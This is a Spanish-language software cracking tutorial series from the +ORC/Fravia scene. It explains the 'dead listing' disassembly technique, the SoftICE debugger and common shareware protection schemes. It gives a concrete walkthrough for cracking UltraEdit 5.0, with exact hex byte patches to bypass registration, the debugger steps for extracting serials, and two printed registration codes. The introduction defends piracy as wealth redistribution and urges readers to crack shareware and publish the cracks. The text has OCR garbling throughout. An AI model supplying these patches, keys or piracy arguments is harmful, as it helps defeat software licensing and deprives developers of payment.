Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


- 
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INTRODUCCIÓN 


!Saludos Familia ! 


Empezemos este año con una de las técnicas crack más importantes "El Listado 
muerto" o "death listing''. Hasta ahora hemos visto la 'aproximación en vivo'' o "live 
approaching' con el maravilloso Softice. 


[DESCENSO A LOS INFIERNOS. 


¡Veamos de una vez por todas como se ejecuta una sentencia en el procesador, desde el 
¡inicio hasta el final. 


¡Supongamos que estamos programando en un lenguaje de Alto Nivel (C, C++, 
Pascal, Delphi, Visual Basic). Se llaman de Alto Nivel para diferenciarlos de los 
lenguajes más próximos al procesador, como el Ensamblador, a los que se llama 
lenguajes de Bajo Nivel. Cuanto más ''Alto'' programemos, más control perderemos 
¡sobre nuestro programa, y esto es un grave problema. 


¡Supongamos un programa, escrito en Alto Nivel, que pinta la frase "HOLA MUNDO" 
en pantalla. ¿ Qué pasos se siguen hasta que realmente se pinta la frase?. 


¡Nuestro programa debe de residir en un fichero, al que se denomina fichero fuente, en 
el que aparece la sentencia para pintar la frase. Este fichero no es entendible por el 
procesador, sólo es un conjunto de caracteres, mu diferente del conjunto de 0 y 1 que 
necesita para trabajar. Es aquí donde entra el compilador, transforma el fichero fuente 
'en un fichero intermedio, también llamado fichero objeto. En esta transformación se 
¡comprueba la sintaxis de las sentencias ( falta el punto y coma) y la semántica (has 
¡pasado un entero cuando se esperaba un real). El compilador realiza entonces una fase 
de linkado para reunir los distintos ficheros objeto que conforman nuestro programa 
final (aunque tengamos un único fichero fuente). En esta fase se determinan el mapeo 
final del program en memoria (que dirección de memoria va a tener cada instrucción 
del conjunto de ficheros objeto). Tras la fase de linkado, el programa final se encuentra 
'en un lenguaje llamado pseudocódigo, mu sencillote. Aquí se pueden tomar 3 vías. 


Primera: Dejar el programa como está, y que otros pogramas o librerías (como la 
'vbrun500.dll de Visual Basic) lo traduzcan (lo interpreten) a sentencias entendibles por 
el porcesador. 


Segunda: Transformar el pseudocódigo a un lenguaje de Bajo Nivel como el 
ensamblador. En tal caso, se necesitará un compilador de ensamblador para que el 
¡programa pueda ser ejecutado. OJO, el ensamblador no es entendible por el tonto 
¡procesador que sólo ve unos y ceros, son dos cosas distintas. 


¡Tecera: La más común, transformar directamente de pseudocódigo a ejecutable 


¡Un fichero ejecutable consta de unos y ceros (o de números en hexa, según se mire) 
¡ordenados de una forma especial; ordenados en instrucciones: Los 3 primeros números 
son el tipo de instrucción, los 4 siguientes el operandol, el siguiente el operador...Cada 
¡instrucción es depiezada dentro del procesador y dan a lugar a la ejecución de un 


conjunto de programas presenten dentro del procesador, son las microrutinas. Estas 
microrutinas son las encargadas de bloquear buses, activar multiplexores, dar tensión a 
un transistor o no, pa enterndernos. Accionando correctamente buses, multiplexires... 
¡se pintará relamete la frase en pantalla. 


Bien, esto es todo. 
Mu bien y esto pa que coño me sirve. 


¡Existe una correspondencia directa entre lenguaje ensablador y programa ejecutable. 
Gracias a un desensamblador (W32DASM, IDA PRO), a partir de un ejecutable 
podemos obtener el programa el lenguaje ensablador sin disponer del fichero fuente. 
Un program en ensamblador puede ser fácilmente entendido por los humanos (o eso 
dicen algunos). Esto nos da un poder tremendo a los crackers. Podemos saber como 
funciona un programa sin necesitar del programa original. Y lo que es má aún, 
independientemente del lenguaje de Alto Nivel. Todos los lenguajestienen que pasar a 
ejecutable de alguna u otra forma, y es aquí cuando usamos nuestro desensamblador y 
extraer su listado en ensablador. Da igual que programa esté hecho en Pascal, O C++, 
lo entederemos igualmente ya que leeremos ensamblador. 


EL LISTADO MUERTO 


¡La idea es sencilla. Cojemos nuestro desensamblador favorito y se lo pasamos al 
objetivo. Obtendremos un listado en ensamblador de nuestro programa a crackear. La 
técnica crack se llama Listado muerto porque entenderemos y manejaremos el 
¡programa con este listado, sin tener que ejecutarlo, con el programa muerto. A 
diferencia de cuando lanzamos el Softlce y entendemos el programa cuando se está 
ejecuntandose, cuando "vive". 


¡Hay tre ventajas fundaentales para utilizar el Listado Muerto. 


- Podemos seguir el programa fácilmemte de atrás hacia adelante, basta con pasar de 
página, no hace falta volver a ejecutatlo. 


- Es mucho más relajado imprimir y estudiar 4 páginas de código que rastrear con el 
¡SoftIce. Este es uno de los consejos de +ORC. 


- Se descubren pequeños secretos, como rutinas inactivas. 


La paciencia y la tranquilidad son dos requisitos fundamentales en un cracker. Es fácil 
perderte trazando con el SoftIce e imposible con el Listado Muerto. 


Manos a la Obra 


Una vez desensamblado el objetivo, la idea es buscar cadenas de texto interesantes, 
como "unregistered", expired”, "congratulations'' y mirar al rededor de estas 
cadenas buscando un salto mágico. Las palabras en concreto dependen del programa y 
¡son las que aparecen para recordarte que aún no te has registrado. 


CÓMO CRACKEAR UEDIT 5.0 


Objetivo: Uedit 5.0. 

Versión: 5.0 3/7/97 

Nombre del ejecutable: uedit32.exe 

Website: http://www.uedit.com 

Tamaño del ejecutable: 812.514 bytes. 

Tipo de protección: Por número de serie y temporal. 
Dificultad: Medio. 

Tiempo de crackeo: 5 minutos. 

Herramientas: W32dasms.X, Softlce. 


Siguiendo la recomendación del maestro +ORC, continuamos con el crack a nuestras 
herramientas de trabajo. En este caso nos encontramos ante un excelente editor 


hexadecimal, vital para nuestros negocios :-) 


Instalemos el programa, ejecutémoslo y veamos lo que nos encontramos. ARRJJ!!, una 


horrible ventana nos dice que tenemos 45 diás para registranos. Además tiene un bonito 
botón ''Enter Authorization Code". Pulsemos y veamos. Un típico nombre de usario y 
¡número de serie (al que le llamaré passwod o pass). Si pulsamos cuaquier guarrada en 
¡ambos, sorpresa, ningúm mensaje advirtiendo del error, ningún pitido (recordais el 


capítulo ID), nada excepto una ventana de mensaje que dice que hace falta cerrar el 


¡programa para validar el código. ¿Habrá leido lan D. Mead las lecciones de 
'Estado+Porcino?. Bien, ¿por donde atacar?. No tenemos nada que nos indique que nos 


hemos equivocado. ¿Que tal si usamos el Listado Muerto amiguitos? 


Una vez desensablado el programa y dentro del W32dasm pulsemos el botón de Strn Ref 


(el boton que está al lado del botón de impresora) para ver las cadenas de caracteres que 
aparecen en el nuetro objetivo. Que vemos, que casualidad , tenemos la frase ''Thank 
you fot supporting Shareware" , hagamos doble click y veamos donde aparecemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401B77(C) | 

:00401B7D 83FB09 cmp ebx, 00000009 

1:00401B80 7504 jne 00401B86 

1:00401B82 C645EC20 mov [ebp-14], 20 * Referenced by a (U)nconditional or (C)onditional Jump at 
:00401B86 8D45C8 lea eax, dword ptr [ebp-38] 

|* Possible Reference to String Resource ID=00010: '' Thank you for supporting Shareware." 


:00401B89 6A0A push 0000000A 


¡En :00401B89 tenemos una referencia a la cadena que nos interesa. Cada frase del 
¡programa tiene asociado un número, en este caso es el 0000000A y este número se les 
¡pasa al las rutinas que tienen que imprimir los mensajes. La forma tradicional de 
¡pasarle parámetros a una rutina es a través la pila mediante push (como en :00401B89 ). 
¡Los parámetros se pasan empezando por el último, es lo que se llama paso de 
¡parámetros mediate el modelo de PASCAL, existen otros modelos, pero son poco 
jutilizados. 


¡¿Estamos en el camino adecuado¿, nop, ya que el número de nuestra frase, el 0000000A 
¡(en es número 10 en decimal) es muy utilizado en cualquier programa y cada vez que 
laparezca, el desensamblador pensará que se está haciendo referencia a nuestra frase. 
¡Bien pensemos un poco. 


¡Nuestro programa está limitado por 45 días de uso, pasado ese tiempo, lo normal es que 
[nos aparezca una frase deciendo algo así como ''Evaluation time expired". Busquemos 
¡(Con el botón de la linterna ) la palabra expired pasada a una rutina mediante push a 
[ver que encontramos. 


:043F7D3 E8375DFCFF call 0040550F 

:0043F7D8 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F7DE 758A jne 0043F76A 

:0043F7E0 8D4D10 lea ecx, dword ptr [ebp+10] 


1:0043F7E3 E829C00100 call 0045B811 


:0043F7E8 8D4D14 lea ecx, dword ptr [ebp+14] 
:0043F7EB C645FC01 mov [ebp-04], 01 
:0043F7EF E81DC00100 call 0045B811 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day 
[Evaluation time expired!!!!" | 


:0043F7F4 6A44 push 00000044 
BINGO. No sentís el código, no percibis como estamos en el camino correcto. 


¡Si, tenemos en :0043F7F4 un push con el número asociado a la frase que buscamos y 
¡justo en :0043F7DE un salto a 0043F76A que evita imprimir el mesaje, pero el punto 
clave es ver la comprobación del salto en :0043F7D$8. Se comprueba si el contenido de 
¡EBX es igual a una dirección fija de memoria la [004A0CDC]. Las direcciones fijas son 
¡las típicas variables globales tan mal utilizadas en los programas. Tenemos una variable 
global que controla la aparición de un mensaje de error. En algún punto del programa 
debe de inicializarse [004A0CDC] con un valor ,si localizamos este trozo de código, 
estaremos en plena rutina de comprobación. ¿Facil, verdad? 


Busquemos [004A0CDC] y veamos quien la inicializa, sólo nos interesan las sentencias 
que inicializen la variable, no las sentencias que comprueban su valor. Normalmente se 
inicializa por defecto a un valor de error (indicando que no estamos registrados) y se 
linicializa corectamente cuando nos registrmemos. Conforme aparecen occurencias de 
nuestra variable glabal sabemos que estamos en el buen camino porque siempre está 
¡rodeada de mensajes de error o de felicitación. 


Buscando [004A0CDC] encontramos las siguientes sentencias que modifican la variable 
(el resto de apariciones son comprobaciones del valor) 


:00405541 893DDC0C4A00 mov dword ptr [004A0CDC], edi 
:004056A3 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 
:004057D4 8325DC0C4A0000 and dword ptr [004A0CDC], 00000000 
:00426924 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 


:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Que tenemos aquí. Parece lógico pensar que en :004057D4 tenemos la incialización por 
defecto, ya que un AND con ceros da cero. La sentencia contraria la tenemos en 
:0043F684 que mueve 1 a la variable, esto sin duda indica que nos hemos registrado. 
También podría ser al revés, cero registrado, uno no registrado, pero este no es el caso. 
¡Basta ejecutar el Softice y poner bpr 004A0CDC 004A0CDC rw, la primera 
modificación debe ser la asignación por defecto, en este caso la :004057D4. Por tanto solo 
debemos centrarnos en la asignación a uno :0043F684, olvidando el resto de 
asignaciones. Esto es un axioma fundamental ante la duda, elige siempre la solución más 
sencilla. Bien, veamos que hay entorno a la :0043F684 


:0043F65C E89A560300 call 00474CFB 

:0043F661 8B7804 mov edi, dword ptr [eax+04] 

:0043F664 8B4514 mov eax, dword ptr [ebp+14] 

:0043F667 48 dec eax 

:0043F668 7478 je 0043F6E2 

:0043F66A 48 dec eax 

:0043F66B 0F85F9000000 jne 0043F76A 

1:0043F671 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F677 0F85DA 010000 jne 0043F857 

:0043F67D 833DBC024A0000 cmp dword ptr [004A02BC], 00000000 
:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Tenemos diversos saltos que evitan nuestra asignación a uno. El primer salto, sestá en 
:0043F668 7478 je 0043F6E2 que tal si lo cambiamos por EB1A ¡mp 43F684. Osea, 
siempre saltamos a 43F684 evitando las comprobaciones de :0043F66B y :0043F677.El 
código EB es la instrucción de salto incondincional JMP, 1A es el número de bytes desde 
la sentencia condicional hasta la sentencia donde queremos saltar. Fácil, ¿verdad?. 


Perfecto, rula. Basta con buscar en el ejecutable uedit32 la secuencia 8$B451448747848 y 
cambiarla por 8B451448EB1A48. Pero hay un peque problema, el crack funciona pero 
no tenemos un número de serie correcto. En principio basta, pero pensando un poco 


¡podremos sacar nuestro propio número de Serie. ¿ Qué se os ocurre? 


¡Sip, exactamante,¿ que tal si le seguimos la pista a nuestro número de serie basura y 
¡vemos con quién se comparará? . La pregunata es, donde coloco un bpx para pararme 
justo antes de que se compruebe mi número de serie. La respuesta es sencilla, en 
:43F618 (echarle un vistazo al listado muerto) comienza la rutina en la que se asigna a 1 
nuestra variable glabal. Este puede ser un buen comienzo. Abrimos el Softice con el 
¡uedit, ponemos nuestro nombre Estado+Porcino y un número basura 1212121212121212 
. Cerramos el uedit y lanzamos de nuevo el SoftIce poniendo la sentencia bpx 43F618. 
¡Aparecemos en :43F618, ahora es el momento de buscan nuestro número de serie con s 


30:00 1 HH 1212121210 encontramos es :942F9C (esta direcciónpuede cambiar en tu 


¡ordenador). Borramos el punto de ruptura anterior con bc O y creamos uno nuevo con la 
dirección donde está nuestra password con bpr 942F9C 942F9C+f rw seguimos adelante 


¡con Crtl+D para ver quien caen en buestra trampa. Aparecemos en :40B73A con varios 
¡movsd , nuestra password se está copiando en otro sitio. La sentencia movsd, copia 
¡caracteres de ees:esi a ees:edi. Pongamos en el Softlce d ees:edi para ver como realmente 
se va a copiar, además pongamos otro punto de ruptura en la nueva posición de nuestra 
¡password con bpr ees:edi ees:edi+f rw .Curiosamente, si nos movemos un poco con los 
¡cursores por ees:edi aparecen las passwords correctas, pero todavía no es el momento. 
¡Lancemos de nuevo el Softlce con Crt1+D y aparecemos en :444FOE ,aquí encontramos 
'una pequeña comprobación, en ecx tenemos nuestra pass (para comprobarlo basta con 
¡poner d ecx) y en edx apuntamos a una zona de nuestro nombre, concretamente a 
'"tado+Porcino". Esto no es exactamente lo qu buscamos, así que sigamos adelante con 
¡Crtl+D y aparecemos en :444EBO con una comprobación entre edx y ecx a través de al. 
Curiosamente edx apunta a nuestra pass y ecx apunta a Y2+cHdcBd6=DBC/P este 
churro es la pass correcta, si seguimos con Crt1+D aparecemos en el mismo sitio con edx 
¡apuntando a nuestra pass y ecx apunta a JVWKTUUTHO02166710 otra pass correcta. A lo 
largo de la evolución del programa desde sus primeras versiones, se ha cambiado 2 veces 
de generador de pass por cuestiones de seguridad, ¡qué estúpidos!. Por eso la doble 


comprobación, ver si nuestra pass es del antiguo generador o del nuevo. 


¡Eso es todo por ahora, no seais unos descerebrados y utilicéis mi pass, buscad la vuestra, 
es mu sencillote. 


¡Espero vuestras opiniones, sugerencias y ensayos en estadoporcino Ohotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


¡Recordad bebed de la fuente, buscad a +ORC en la red. 
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UN POCO DE TODO: 


¡Saludos Familia ! 


¡He decidido crear esta serie de capítulos con un objetivo puramente educativo (sin 
ningún tipo de obscuro interés comercial). Mi objetivo es ayudar a los nuevos crackers 
en sus primeros pasos. 


¡Agradecimientos 


Al TodoPoderoso +0RC, a su acólito +FRAVIA y a los miembros de WKT por su 
¡apoyo. 


¿Qué es eso de crackear? 


Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, 
¡personales pero no lucrativos. Crackear también se llama ingeniería inversa (Reverse 
Engineering), ya que sin el programa fuente se es capaz de analizar el comportamiento 
del programa y modificarlo para tus intereses. 


¿Por qué crackear? 


Vivimos en un una sociedad que da asco. Es inconcebible que se destruyan o penalicen 
la producción de productos básicos (cereales,lácteos...) en aras de una estabilidad de 
precios.Vivimos en una sociedad donde el 95% de la gente se ve sometida al control de 
un 5 %. Toda persona debería tener un mínimo de recursos para ser feliz,pero esto no 
es así. 


El noble arte del crakeo es una herramienta para distribuir la riqueza entre la 
sociedad. Si necesitas un programa (que tienes en un CD-ROM) y no tienes una cuenta 
en un banco USA, ni 30 dólares, ¿por qué narices tienes que esperar y pagar si lo 
necesitas?, crackealo y publica el crack en Internet. Así ayudarás a la gente menos 
¡afortunada que está axifiada por esta sociedad desigualitaria. 


¿A quién va dirigido este curso? 


Este curso va dirigido a toda persona con interés en el crack y/o con la filosofía crack. 


Sin olvidar a los programadores. 


¿Qué es lo que vamos a aprender? 


Dejaremos de un lado el añorado DOS, para centrarnos en cracks para programas en 
WO95. 


¿No estaremos quitando el pan a los programadores de aplicaciones? 


Los programadores viven muy bien a costa de los royaltis que pagan las grandes 
empresas y esos repugnantes yupis encorbatados con escased de neuronas. Además, un 
programa crakeado es más conocido y utilizado que uno que no lo esté. Digamos que el 
crack es una forma de publicidad. Baste recordar el compilador de Pascal de la casa 
Borland. Originalmente fue copieteado y distribuido casi libremente hasta la saciedad. 
Borland conocía este hecho y por eso no introdujo ningún tipo de protección. Al cabo 
de poco tiempo, esos estudiantes se convirtieron en programadores que reclamaban a 
sus empresas la compra del compilador que sabían utilizar, el Pascal de Borland. Si las 
casas de soft ya son ricas sin nuestro dinero, ¿a que estado de corrupción se llegaría si 
lo tuvieran?. Aunque parezca extraño este ensayo está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir software de 
calidad. 


En último caso depende de la conciencia de cada uno, si crees que un programador ha 
realizado una buena aplicación, que te es útil y que además está bien programada, 
entonces obra adecuadamente y recompénsalo registrándote. A decir verdad sólo he 
encontrado un programa de este estilo 


¿Qué necesito pa esto de crakear? 


- Interés y PazY Ciencia. 


- Algún conocimiento de ensamblador. Cuanto más conozcas mejor crackearás, pero 
para este curso mas bien poco, intentaré hacer las cosas fáciles. 


- Ayuda de otro cracker más experto (por ejemplo Estado+Porcino) 


IDEAS BÁSICAS SOBRE CRACKING 


¡Un programa no es más que un montón de instrucciones (haz, esto, haz lo otro), una 
tras otra. Estas instrucciones, (en general) están en memoria, parte de ellas se encargan 
de impedir la ejecución del resto (el verdadero programa). Resumiendo, tienes un 
bonito programa tras una puerta (esquema de protección), nuestro objetivo es reventar 
lla puerta, buscar la llave,pasar por las rendijas,quemarla..., como puedes ver una 
cantidad inagotable de ataques. 


'Un pequeño inciso, sólo puedes reactivar instrucciones que se encuentren en el 
¡programa. Por ejemplo, si se ha desactivado la opción de salvar, puede ser que el 
conjunto de sentencias para salvar el programa esté presente pero desactivado, o bien 
¡que simplemente no esté. Si están las sentencias, se pueden reanimar, sino están 
¡entramos en un mundo diferente, una evolución del cracking, la apasionante 
Reconstrucción Software, pero eso será tema de otro capítulo. 


¡Herramientas CRACK 


¡Demos un breve repaso a las principales herramientas que utilizaremos a lo largo del 
¡curso. Existen otras muchas herramientas que las comentaré cuando nos sean 
necesarias. 


¡Editor hexadecimal 


Los programas no son más que un conjunto de instrucciones y cada instrucción no es 
¡más que un conjunto de bits, pero donde demonios se guardan esos bits?. 


¡Los bits del programa se localizan en los ficheros, p.e. las instrucciones del programa 
de compresión arj se guardan en el fichero arj.exe. Hay algunos programas que no 
¡guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto 
¡son los programas que utilizan librerías dinámicas (o dil) 


Un editor hexa, no es más que un programa, que permite "'editar'' los ficheros de 
instrucciones de otros programas, osea, que permite ver,modificar,copiar,pegar... los 
bits de los programas. Para simplificar la cosa no se muestran los bits a pelo, sino que 
¡se muestran en hexadecimal, de ahí su nombre. Nosotros lo utilizaremos para alterar el 
¡comportamiento de los programas. Supongamos que conocemos la instrucción 
sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos 
¡modificarla por jnz 23, bien como toda instrucción no es más que un conjunto de bits, 
¡sea 0110 para jz 23 y 1001 para jnz 23, sólo nos queda buscar estos bits dentro del 
fichero ejecutable del programa (que es, en general, el contiene las sentencias del 
¡programa). Como usamos un editor hexa, debemos buscar la secuencia de un unos y 
¡ceros en hexa en el fichero del programa que queremos modificar. Si la secuencia que 
buscamos es muy común deberemos utilizar las instrucciones que se encuentran 
entorno a la instrucción a modificar. 


¡Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el 
fichero, si existe más de una, debemos añadir a la búsqueda las sentencias de alrededor, 
¡sino se corre el riego de modificar la sentencia equivocada, lo que provoca casi siempre 
un "cuelgue". 


Un no es más que una modificación de las instrucciones de un fichero, así pues para 
hacer un crack debemos saber que instrucciones modificar y en qué fichero. Una vez 
crackeado el fichero, el programa se comportará siguiendo la nueva sentencia que le 
hemos modificado. 


Hay un montón de editores hexa, yo os recomiendo UltraEdit-32 Professional, os lo 
podéis bajar de http://ftpsearch.ntnu.no/ 


(excelente herramienta de búsqueda en la Web, utilízala cuando no encuentres algún 
¡fichero) busca w32dasm. Yo utilizo la versión 4.31a. Cada cracker tiene su editor 
favorito, !encuentra el tuyo!. Este programa es shareware, así que tendrás que 
crackearlo, recuerda : lo primero que tienes que crakear son tus propias herramientas. 
Si no puedes crackearlo, busca otro editor hexa, los hay a montones. 


¡Desensamblador 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje 
ensamblador. El lenguaje ensamblador, es el conjunto de sentencias que entiende el 
microprocesador (tu Pentium o mi 486). El procesador es el corazón del ordenador, 
todas las sentencias son ejecutadas por él y sólo por él. Por ejemplo un 43 en hexa se 
transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto de 
crackear. 


Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta 
que veremos más adelante. 


Puedes pillar un magnífico desensamblador para W95 en 
¡http://www/expage.com/page/w32dasm , €s Shareware, así que deberás crackearlo. 
¡Próximamente le dedicaremos un capítulo al w32dasm y aprenderemos a crackearlo. 
'Yo utilizo la versión 8.9, aunque una posterior es también útil. 


Debugger 


Un debugger permite ejecutar instrucción a instrucción (instrucciones en ensamblador, 
se entiende) un programa, por tanto también ejecutará instrucción a instrucción la 
rutina de protección, ya que es parte del programa. Esto nos permitirá analizar su 
comportamiento. 


¡El mejor debugger para W95 es sin duda el Softice quo te lo puedes bajar de 
¡http://www.numega.com , es sin duda uno de los mejores programas que he visto en mi 
vida. Te recomiendo que te bajes también los manuales. El Softice es una de las mejores 


¡herramientas cuanto más domines al Softice, mejor crakearás, y te aseguro que se 
pueden realizar verdaderas maravillas con él. Para trazar (esto es, pasar el debug) a 
programas MS-DOS, puedes utilizar versiones anteriores del Softice o utilizar algunos 
de los excelentes debugger que hay para Dos como el SymbDebug. 


Os indicaré un par de consejos y trucos para el Softice. 
--> Instalación 


Haz la prueba de pantalla, si te la saltas, lo más seguro es que cuando actives el Softice 
se te quede la pantalla a rayas. Busca el driver de la tarjeta de vídeo que tengas 
instalada en W95 dentro de la lista que se ofrece. Aunque la encuentres, haz la prueba 
de pantalla, es posible que no funcione correctamente. Si no encuentras tu tarjeta de 
vídeo o tienes problemas de pantalla, corta la instalación y selecciona ''Adaptador de 
Vídeo Standard VGA", reinstala el Softice y utiliza ese mismo driver para la prueba de 
pantalla. Si sigues teniendo problemas te remito a la Doc del Softice (que deberías 
haberte bajado). Particularmente, con el adaptador Standard VGA no he tenido nunca 
problemas. Hay por ahí sueltos una ampliación de drivers de tarjetas para Softice, 
búscalos si no quieres pasa a la VGA Standard. 


Activa la opción de ratón, te evitará escribir bastantes secuencias hexa de instrucciones, 
te permitirá moverte libremente por las ventanas, seleccionar, copiar y pegar texto así 
como redimensionar las ventanas. 


--->Configuración 


El Loader es una pequeña utilidad que permite especificar el programa que queremos 
depurar y además nos permite configurar el Softice, En Edit/Softlce Initialization 
Settings/Initialization string pon X;wl;wr;wd7; code on; y en Histoy Buffer Size pon 
512 

Abre el fichero winice.dat (dentro del directorio de instalación del Softice) , toda línea 
del tipo EXP=c:1windowsisystemisystem.drv , quítale el punto y como inicial. 


--->Ejecución 


El Softice debe cargarse siempre antes que W9S5. Si estas en W95, reinicializa en modo 
MS-DOS y ejecuta WINICE.EXE, este cargará el Softice y W95. Te recomiendo que 
utilices un fichero bat. 


Las ventanas que aparecen son 


Ventana de registros de la CPU (wr). A los típicos se ha añadido una E así se diferencia 
¡los registros normales que admiten 16 bits, de los registros que soportan 32 bits. Por 
ejemplo, ax se llama ahora eax. Siempre podremos referencias a ax, sabiendo que nos 
quedaremos con 16 bits últimos de eax. 


¡Ventana de datos de la CPU (wd). Muestra la memoria en formato hexa, ahí se pueden 


lapreciar los datos que maneja el programa, entre otras cosas. 


'Ventana de código (wc). Muestra, la dirección de memoria en la que se encuentra la 
instrucción, la codificación hexa de la instrucción y la instrucción en ensamblador. 


¡Ventana de control, el la que aparece arriba el nombre del programa que estamos 
¡trazando. Aquí es donde introduciremos los comandos del SoftlIce. 


¡He aquí algunos comandos fundamentales para el Softice: 
¡CTRL+D 


¡Conmuta de W95 al Softice y viceversa. No te asustes por el pantallazo ni por el aspecto 
¡cutre inicial, llegarás a quererlo, créeme. Si salen rayas, vuelve a leer el apartado -- 
>Instalación 


¡F4 


¡Estando en Softice, te permite echar un ojo al estado actual en W95 sin necesidad de 
conmutar. 


¡FS 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutarán una a una 
¡todas las instrucciones de la rutina llamada. 


¡FIO 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutan de golpe todas 
¡las sentencias de la rutina llamada. 


¡FI1 


¡Ejecuta de golpe todas las instrucciones de la rutina actual y se para el la instrucción 
¡siguiente de la rutina padre que llamó a esta rutina. Esto nos permite trazar al padre, 
¡estando en una rutina hija. En cuanto la uses menudo verás que no es tan complicado 
[como parece. 


¡FI2 
¡Ejecuta todas las sentencias hasta el primer ret (incluido) 
¡bpx nombreRutina 


¡Salta al Softice cuando se ejecuta la rutina cuyo nombre es nombreRutina. Ejemplo 
¡bpx messageboxa saltará al Softice cuando el programa muestre una ventana de 


mensaje del tipo mensaggebox. 
bpx dirInstrucción 


Salta al Softice cuando se ejecuta la instrucción que está es la dirección de memoria 
dirInstrucción. 


bpr dirIni dirFin rw 


Salta al Softice cuando hay un acceso de lectura o escritura en las direcciones 
dirIni,dirFin ambas incluidas. Ejemplo bpr 100 109 rw que puesto de otra forma más 
fácil de expresar, nos queda algo como bpr 100 100+9 rw 


sl dir tam'cad' 


Busca la cadena cad a partir de dir hasta dir+tam. Esta sentencia casi siempre tendrá 
este aspecto. Ejemplo s 30:00 1 ffffffff 'cad' . Las comillas son importantes. 30:00 es la 
dirección de comienzo del segmento de datos, osea la dirección de memoria donde están 
los datos del programa y ffffffff es el tamaño del segmento de datos, como veréis hay 
4GB de espacio para almacenar datos. 


d registro 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
guardada en registro. Ejemplo d eax muestra a lo que apunta eax. 


d dirección 
Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección. 
d nomRutina 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
donde comienza la rutina nomRutina. 


Impr Pant 


Vuelca el contenido de la pantalla por la impresora, quizás tengas que darle varia veces 
hasta que el buffer de la impresora se llene. 


[ESQUEMAS DE PROTECCION 

Citaré algunas de las técnicas utilizadas por los programadores para proteger su soft. 
- Números de Serie. 

- Cripple Software (software limitado), en diversas variantes: 
* Tiempo limitado a meses , días, minutos.. 

* Número de ejecuciones o usuarios limitado. 

* Funciones deshabilitadas. 

- Protecciones por discos o CD-ROM llave. 

- Protecciones anti herramientas crack 

* Antidebuggers. 

* Antidescompiladores. 

* Antidesensambladores. 

* Encriptación parcial o total. 

- Ninguna de las anteriores. 

¡Acerca de los programadores 

Sólo dos cosas: 


a) En general son perezosos y a veces estúpidos. 

b) Nunca les creas. 

¡La opción a) es clara, sus esquemas de protección son arcaicos, apenas han sufrido 
modificaciones, tan sólo incorporan trucos viejos sobre esquemas bien conocidos. 
Programas en lenguajes de alto nivel tipo C++, Visual Basic, estos compiladores se 
basan en librerías bien conocidas. El programador no tiene el amor propio de crear su 
propia rutina de protección en ensamblador, prefieren dejarla en manos de 
compiladores que crean código ensamblador ineficiente y fácilmente legible. ¿A qué se 
debe todo esto?, a su mentalidad comercial de la vida, no trabajan por placer, son 
esclavos de su trabajo, verdaderos zombies andantes. Lo importante es acabar y pronto 
no importa la calidad del soft o las quejas del estúpido usuario por la lentitud del 
programa o por los "cuelgues". 


Una breve disgresión, no os habéis preguntado por que las versiones de los programas 
¡salen como churros cada 2 días. La respuesta es que se dejan a propósito las cosas sin 


¡hacer o mal hechas para que al cabo de dos días se pueda sacar una flamante nueva 
versión con una leve modificación la cual debes comprar para no quedarse obsoleto, 
Dios mío que abominación! 


Respecto a b) baste decir que siempre tratan de encubrir sus errores con malolientes 
mentiras. 

PROGRAMADORES, leed esto y aprended, pero que digo, no tenéis tiempo ni para 
¡joder, ni para ver por donde os joden....:-) 


ESQUEMAS DE PROTECCIÓN BASADOS EN NÚMEROS DE SERIE 


Esta es una "antigua" técnica de protección utilizada por las toneladas de shareware 
que nos inundan, basta comprarse un CD por 4 perras y ver 650 MB de programas 
basura, en general, deseosos de exprimir nuestras carteras. Veamos como funcionan. 


El programa puede ser total o parcialmente funcional, pero posee estúpidas ventanas 
que nos recuerdan que somos usuarios no registrados, o bien pitidos mal sonantes o 
mensajes perennes proclamando que les mandemos dinero. A veces, pasado cierto 
tiempo o pasado un número de ejecuciones, el programa deja de funcionar. Todo esto 
inconvenientes se resuelven llamando a la casa que construyó el software (imaginad lo 
que puede costar una llamadita o un Fax a un pueblo mal oliente del esto de Utah en 
USA), o bien mandando un e-mail. En cualquier caso hay que indicar el número de 
VISA donde ellos clavarán sus garras para rellenar sus ya nutridas arcas. Una vez 
desplumado recibimos por e-mail o por teléfono una palabra mágica, un número de 
serie, una password, o lo que sea, yo lo llamaré 'pwd''. Esta pwd desbloquea el 
programa y/o elimina las estúpidas ventanas recordatorio. 


Análisis de esquemas con número de serie 


En general existen dos formas en las que trabajan las rutinas de protección de número 
de serie: 


a) Número de serie independiente del usuario. 

b) Números de serie adaptados al usuario. 

a) si extraemos una pwd, ésta servirá a todos los usuarios. Una pwd válida se diferencia 
de una inválida (por las muletas, es un chiste) por la presencia de ciertos caracteres en 
posiciones fijas (p.e. el carácter 8 debe ser una 'C', el 10 un '-'). Toda pwd que cumpla 
las restricciones será una pwd válida. Por norma, casi todas las pass incorporan el 
carácter '-', 2b en hexa. A veces no se requieren caracteres fijos , sino que la suma 
ASCII cumpla cierta condición. Cada letra del alfabeto y cada carácter numérico tiene 
